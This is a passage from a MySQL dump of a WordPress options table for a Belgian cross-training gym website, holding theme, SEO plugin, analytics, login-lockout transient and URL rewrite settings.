4.90)\";}s:13:\"last_hit_time\";i:1420773962;}s:49:\"http://www2.crosstrainingcenter.be/comments/feed/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:27:\"www2.crosstrainingcenter.be\";}s:11:\"user_agents\";a:1:{i:0;s:63:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\";}s:13:\"last_hit_time\";i:1565980256;}}}', 'yes'),
(62898, '_transient_timeout_wflginfl_1076010300', '1451727723', 'no'),
(62899, '_transient_wflginfl_1076010300', '19', 'no'),
(62904, '_transient_timeout_wflginfl_2538607340', '1451733641', 'no'),
(62905, '_transient_wflginfl_2538607340', '19', 'no'),
(773, 'seo_ultimate_module_import-aiosp', 'a:3:{s:15:\"import_postmeta\";b:1;s:25:\"postmeta_bothexist_action\";s:4:\"skip\";s:17:\"after_post_import\";s:7:\"nothing\";}', 'yes'),
(774, 'seo_ultimate_module_user-code', 'a:1:{s:14:\"global_wp_head\";s:0:\"\";}', 'yes'),
(406, 'wop_options_field', 'a:2:{s:19:\"num_of_wop_sidebars\";s:0:\"\";s:10:\"wop_name_1\";s:8:\"objectif\";}', 'yes'),
(55709, '_transient_timeout_wflginfl_1314998154', '1445981920', 'no'),
(55710, '_transient_wflginfl_1314998154', '1', 'no'),
(55711, '_transient_timeout_wflginfl_1393096204', '1445982221', 'no'),
(55712, '_transient_wflginfl_1393096204', '1', 'no'),
(55713, '_transient_timeout_wflginfl_2083745960', '1445982572', 'no'),
(55714, '_transient_wflginfl_2083745960', '1', 'no'),
(55715, '_transient_timeout_wflginfl_35450627', '1445982624', 'no'),
(55716, '_transient_wflginfl_35450627', '1', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(55717, '_transient_timeout_wflginfl_831973795', '1445982950', 'no'),
(139, 'theme_mods_twentytwelve', 'a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1369332468;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(140, 'current_theme', 'Figero', 'yes'),
(141, 'theme_mods_figero', 'a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:11:\"custom_menu\";i:2;}}', 'yes'),
(142, 'theme_switched', '', 'yes'),
(143, 'figero_options', 'a:33:{s:11:\"of_template\";a:36:{i:0;a:2:{s:4:\"name\";s:16:\"General Settings\";s:4:\"type\";s:7:\"heading\";}i:1;a:4:{s:4:\"name\";s:11:\"Custom Logo\";s:4:\"desc\";s:61:\"Choose your own logo. Optimal Size: 170px Wide by 30px Height\";s:2:\"id\";s:11:\"figero_logo\";s:4:\"type\";s:6:\"upload\";}i:2;a:4:{s:4:\"name\";s:14:\"Custom Favicon\";s:4:\"desc\";s:71:\"Specify a 16px x 16px image that will represent your website\'s favicon.\";s:2:\"id\";s:14:\"figero_favicon\";s:4:\"type\";s:6:\"upload\";}i:3;a:5:{s:4:\"name\";s:20:\"Google Analytic Code\";s:4:\"desc\";s:58:\"Paste your Google Analytics (or other) tracking code here.\";s:2:\"id\";s:16:\"figero_analytics\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:4;a:2:{s:4:\"name\";s:16:\"Top Feature Area\";s:4:\"type\";s:7:\"heading\";}i:5;a:5:{s:4:\"name\";s:15:\"Feature Heading\";s:4:\"desc\";s:17:\"Enter the Heading\";s:2:\"id\";s:20:\"figero_slideheading1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:6;a:5:{s:4:\"name\";s:19:\"Feature Description\";s:4:\"desc\";s:17:\"Enter description\";s:2:\"id\";s:24:\"figero_slidedescription1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:7;a:5:{s:4:\"name\";s:21:\"Text For First Button\";s:4:\"desc\";s:32:\"Enter the Text for First Button.\";s:2:\"id\";s:18:\"figero_slidel_rb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:8;a:5:{s:4:\"name\";s:21:\"Link For First Button\";s:4:\"desc\";s:36:\"Enter the Link URL for First Button.\";s:2:\"id\";s:17:\"figero_slidel_r_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:9;a:5:{s:4:\"name\";s:22:\"Text For Second Button\";s:4:\"desc\";s:33:\"Enter the Text for Second Button.\";s:2:\"id\";s:18:\"figero_slidel_lb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:10;a:5:{s:4:\"name\";s:22:\"Link For Second Button\";s:4:\"desc\";s:37:\"Enter the Link URL for Second Button.\";s:2:\"id\";s:17:\"figero_slidel_l_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:11;a:5:{s:4:\"name\";s:13:\"Feature Image\";s:4:\"desc\";s:67:\"Choose your image to your feature area. Optimal Size: 516px x 300px\";s:2:\"id\";s:18:\"figero_slideimage1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:12;a:2:{s:4:\"name\";s:17:\"Homepage Two Cols\";s:4:\"type\";s:7:\"heading\";}i:13;a:5:{s:4:\"name\";s:19:\"Left Column Heading\";s:4:\"desc\";s:40:\"Enter your heading line for left column.\";s:2:\"id\";s:16:\"figero_headline1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:14;a:5:{s:4:\"name\";s:23:\"Left Column Description\";s:4:\"desc\";s:43:\"Enter your feature content for left column.\";s:2:\"id\";s:15:\"figero_feature1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:15;a:5:{s:4:\"name\";s:20:\"Right Column Heading\";s:4:\"desc\";s:41:\"Enter your heading line for right column.\";s:2:\"id\";s:16:\"figero_headline2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:16;a:5:{s:4:\"name\";s:18:\"Right Column Image\";s:4:\"desc\";s:38:\"Choose image for right column section.\";s:2:\"id\";s:19:\"figero_testo_image1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:17;a:5:{s:4:\"name\";s:24:\"Right Column Description\";s:4:\"desc\";s:43:\"Enter description for right column section.\";s:2:\"id\";s:18:\"figero_testo_desc1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:18;a:2:{s:4:\"name\";s:25:\"Homepage Featured Section\";s:4:\"type\";s:7:\"heading\";}i:19;a:5:{s:4:\"name\";s:27:\"First Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for first feature section.\";s:2:\"id\";s:21:\"figero_featured_img_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:20;a:5:{s:4:\"name\";s:29:\"First Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for first feature section.\";s:2:\"id\";s:19:\"figero_featured_h_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:21;a:5:{s:4:\"name\";s:33:\"First Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for first feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:22;a:3:{s:4:\"name\";s:23:\"Second Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:23;a:5:{s:4:\"name\";s:28:\"Second Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for second feature section.\";s:2:\"id\";s:21:\"figero_featured_img_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:24;a:5:{s:4:\"name\";s:30:\"Second Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for second feature section.\";s:2:\"id\";s:19:\"figero_featured_h_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:25;a:5:{s:4:\"name\";s:34:\"Second Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for second feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:26;a:3:{s:4:\"name\";s:22:\"Third Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:27;a:5:{s:4:\"name\";s:27:\"Third Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for third feature section.\";s:2:\"id\";s:21:\"figero_featured_img_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:28;a:5:{s:4:\"name\";s:29:\"Third Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for third feature section.\";s:2:\"id\";s:19:\"figero_featured_h_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:29;a:5:{s:4:\"name\";s:33:\"Third Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for third feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:30;a:3:{s:4:\"name\";s:23:\"Fourth Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:31;a:5:{s:4:\"name\";s:28:\"Fourth Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for fourth feature section.\";s:2:\"id\";s:21:\"figero_featured_img_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:32;a:5:{s:4:\"name\";s:30:\"Fourth Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for fourth feature section.\";s:2:\"id\";s:19:\"figero_featured_h_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:33;a:5:{s:4:\"name\";s:34:\"Fourth Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for fourth feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:34;a:2:{s:4:\"name\";s:15:\"Styling Options\";s:4:\"type\";s:7:\"heading\";}i:35;a:5:{s:4:\"name\";s:10:\"Custom CSS\";s:4:\"desc\";s:62:\"Quickly add some CSS to your theme by adding it to this block.\";s:2:\"id\";s:16:\"figero_customcss\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}}s:12:\"of_themename\";s:6:\"Figero\";s:12:\"of_shortname\";s:2:\"of\";s:11:\"figero_logo\";s:74:\"http://www.crosstrainingcenter.be/wp-content/uploads/2014/02/lm-coach2.png\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:435:\"<script>\r\n  (function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\r\n  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n  })(window,document,\'script\',\'//www.google-analytics.com/analytics.js\',\'ga\');\r\n\r\n  ga(\'create\', \'UA-42733144-1\', \'crosstrainingcenter.be\');\r\n  ga(\'send\', \'pageview\');\r\n\r\n</script>\";s:20:\"figero_slideheading1\";s:1:\" \";s:24:\"figero_slidedescription1\";s:247:\"Unique en Belgique, une nouvelle façon de faire du fitness. Venez découvrir notre salle de cross training à Namur. Chez nous, vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";s:18:\"figero_slidel_rb_1\";s:15:\"Séance Booster\";s:17:\"figero_slidel_r_1\";s:46:\"http://www.crosstrainingcenter.be/?page_id=266\";s:18:\"figero_slidel_lb_1\";s:21:\"Réservation en ligne\";s:17:\"figero_slidel_l_1\";s:42:\"http://reservation.crosstrainingcenter.be/\";s:18:\"figero_slideimage1\";s:77:\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/silouhette62.png\";s:16:\"figero_headline1\";s:1:\" \";s:15:\"figero_feature1\";s:1492:\"<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%; padding-bottom:30px\"><div class=\"objectif\">Un coaching personnel</div><br>Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles.<br><br><br></td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Un encadrement professionnel</div><br>Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Des outils innovants</div><br>Fini le travail répétitif, monotone et peu efficace des salles de musculation. Grâce aux TRX, RIP Trainer, Kettlebel, … des outils funs, travaillez votre muscle de manière fonctionnelle et performante dans une ambiance conviviale. </td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Une approche globale</div><br>Pour optimaliser le travail et  vous aider à atteindre vos objectifs, nous vous proposons d’intervenir sur 3 éléments importants : l’alimentation, l’activité physique et le stress.</td>\r\n</tr>\r\n</tbody>\r\n</table>\";s:16:\"figero_headline2\";s:0:\"\";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";s:10:\"of_options\";a:29:{s:11:\"figero_logo\";s:0:\"\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:0:\"\";s:20:\"figero_slideheading1\";s:0:\"\";s:24:\"figero_slidedescription1\";s:0:\"\";s:18:\"figero_slidel_rb_1\";s:0:\"\";s:17:\"figero_slidel_r_1\";s:0:\"\";s:18:\"figero_slidel_lb_1\";s:0:\"\";s:17:\"figero_slidel_l_1\";s:0:\"\";s:18:\"figero_slideimage1\";s:0:\"\";s:16:\"figero_headline1\";s:0:\"\";s:15:\"figero_feature1\";s:0:\"\";s:16:\"figero_headline2\";s:0:\"\";s:19:\"figero_testo_image1\";s:0:\"\";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";}s:19:\"figero_testo_image1\";s:0:\"\";}', 'yes'),
(176, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(144, 'of_options', 'a:0:{}', 'yes'),
(145, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}', 'yes'),
(223, 'slideshow_option', 'a:13:{s:2:\"fx\";s:5:\"swirl\";s:5:\"delay\";s:4:\"3000\";s:10:\"navigation\";s:4:\"true\";s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"300\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:6:\"sDelay\";s:2:\"30\";s:7:\"opacity\";s:1:\"1\";s:10:\"titleSpeed\";s:3:\"500\";s:10:\"jsmanually\";s:5:\"false\";s:11:\"cssmanually\";s:5:\"false\";s:10:\"hoverPause\";s:5:\"false\";}', 'yes'),
(775, 'seo_ultimate_module_autolinks', 'a:16:{s:25:\"dampen_sitewide_lpa_value\";i:50;s:34:\"enable_perlink_dampen_sitewide_lpa\";b:0;s:17:\"enable_self_links\";b:0;s:24:\"enable_current_url_links\";b:0;s:15:\"limit_lpp_value\";i:5;s:15:\"limit_lpa_value\";i:2;s:15:\"limit_lpu_value\";i:1;s:13:\"linkfree_tags\";s:30:\"code,pre,kbd,h1,h2,h3,h4,h5,h6\";s:22:\"autolink_posttype_post\";b:1;s:22:\"autolink_posttype_page\";b:1;s:28:\"autolink_posttype_attachment\";b:1;s:31:\"autolink_posttype_collaborateur\";b:1;s:26:\"footer_link_section_format\";s:67:\"<div id=\"su-footer-links\" style=\"text-align: center;\">{links}</div>\";s:18:\"footer_link_format\";s:6:\"{link}\";s:15:\"footer_link_sep\";s:3:\" | \";s:5:\"links\";a:0:{}}', 'yes'),
(776, 'seo_ultimate_module_settings', 'a:3:{s:16:\"attribution_link\";b:0;s:9:\"mark_code\";b:1;s:11:\"wp_ultimate\";b:1;}', 'yes'),
(777, 'seo_ultimate_module_internal-link-aliases', 'a:2:{s:9:\"alias_dir\";s:2:\"go\";s:7:\"aliases\";a:0:{}}', 'yes'),
(778, 'seo_ultimate_module_linkbox', 'a:1:{s:4:\"html\";s:298:\"<div class=\"su-linkbox\" id=\"post-{id}-linkbox\"><div class=\"su-linkbox-label\">Link to this post!</div><div class=\"su-linkbox-field\"><input type=\"text\" value=\"&lt;a href=&quot;{url}&quot;&gt;{title}&lt;/a&gt;\" onclick=\"javascript:this.select()\" readonly=\"readonly\" style=\"width: 100%;\" /></div></div>\";}', 'yes'),
(56123, '_transient_timeout_wflginfl_1192335798', '1446094565', 'no'),
(56124, '_transient_wflginfl_1192335798', '1', 'no'),
(55721, '_transient_timeout_wflginfl_533205232', '1445983430', 'no'),
(55722, '_transient_wflginfl_533205232', '1', 'no'),
(55729, '_transient_timeout_wflginfl_533568640', '1445984186', 'no'),
(55724, '_transient_timeout_wflginfl_702965155', '1445983685', 'no'),
(55725, '_transient_wflginfl_702965155', '1', 'no'),
(55732, '_transient_wflginfl_1951009314', '1', 'no'),
(55914, '_transient_wflginfl_1220924677', '1', 'no'),
(59124, '_transient_timeout_wflginfl_702333185', '1447270209', 'no'),
(55718, '_transient_wflginfl_831973795', '1', 'no'),
(561, 'easy_table_plugin_option', 'a:20:{s:12:\"shortcodetag\";s:5:\"table\";s:7:\"attrtag\";s:4:\"attr\";s:11:\"tablewidget\";s:0:\"\";s:12:\"scriptloadin\";a:7:{i:0;s:0:\"\";i:1;s:9:\"is_single\";i:2;s:0:\"\";i:3;s:7:\"is_page\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";}s:14:\"scriptinfooter\";s:0:\"\";s:11:\"tablesorter\";s:0:\"\";s:2:\"th\";s:0:\"\";s:7:\"loadcss\";s:1:\"1\";s:5:\"class\";s:0:\"\";s:5:\"width\";s:4:\"100%\";s:6:\"border\";s:1:\"0\";s:5:\"theme\";s:8:\"cuscosky\";s:5:\"limit\";s:1:\"0\";s:4:\"trim\";s:0:\"\";s:2:\"nl\";s:2:\"~~\";s:10:\"terminator\";s:2:\"\\n\";s:9:\"delimiter\";s:1:\",\";s:9:\"enclosure\";s:6:\"&quot;\";s:6:\"escape\";s:1:\"\\\";s:7:\"csvfile\";s:0:\"\";}', 'yes'),
(779, 'seo_ultimate_module_meta', 'a:6:{s:32:\"home_description_tagline_default\";b:1;s:25:\"description_posttype_post\";s:9:\"{excerpt}\";s:25:\"description_posttype_page\";s:0:\"\";s:29:\"description_taxonomy_category\";s:13:\"{description}\";s:29:\"description_taxonomy_post_tag\";s:13:\"{description}\";s:17:\"description_paged\";s:31:\"{meta_description} - Page {num}\";}', 'yes'),
(621, 'wpcf7', 'a:1:{s:7:\"version\";s:5:\"3.5.3\";}', 'yes'),
(623, '_transient_random_seed', 'be6bc5c9d4b2e93e60c927144b4107ff', 'yes'),
(38275, 'rewrite_rules', 'a:90:{s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:62:\"collaborateur-service/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?collaborateur_service=$matches[1]&feed=$matches[2]\";s:57:\"collaborateur-service/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?collaborateur_service=$matches[1]&feed=$matches[2]\";s:50:\"collaborateur-service/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?collaborateur_service=$matches[1]&paged=$matches[2]\";s:32:\"collaborateur-service/([^/]+)/?$\";s:43:\"index.php?collaborateur_service=$matches[1]\";s:63:\"collaborateur-worksite/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:61:\"index.php?collaborateur_worksite=$matches[1]&feed=$matches[2]\";s:58:\"collaborateur-worksite/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:61:\"index.php?collaborateur_worksite=$matches[1]&feed=$matches[2]\";s:51:\"collaborateur-worksite/([^/]+)/page/?([0-9]{1,})/?$\";s:62:\"index.php?collaborateur_worksite=$matches[1]&paged=$matches[2]\";s:33:\"collaborateur-worksite/([^/]+)/?$\";s:44:\"index.php?collaborateur_worksite=$matches[1]\";s:41:\"collaborateur/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"collaborateur/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"collaborateur/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"collaborateur/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"collaborateur/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"collaborateur/([^/]+)/trackback/?$\";s:40:\"index.php?collaborateur=$matches[1]&tb=1\";s:42:\"collaborateur/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?collaborateur=$matches[1]&paged=$matches[2]\";s:49:\"collaborateur/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?collaborateur=$matches[1]&cpage=$matches[2]\";s:34:\"collaborateur/([^/]+)(/[0-9]+)?/?$\";s:52:\"index.php?collaborateur=$matches[1]&page=$matches[2]\";s:30:\"collaborateur/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"collaborateur/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"collaborateur/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"collaborateur/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"collaborateur/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([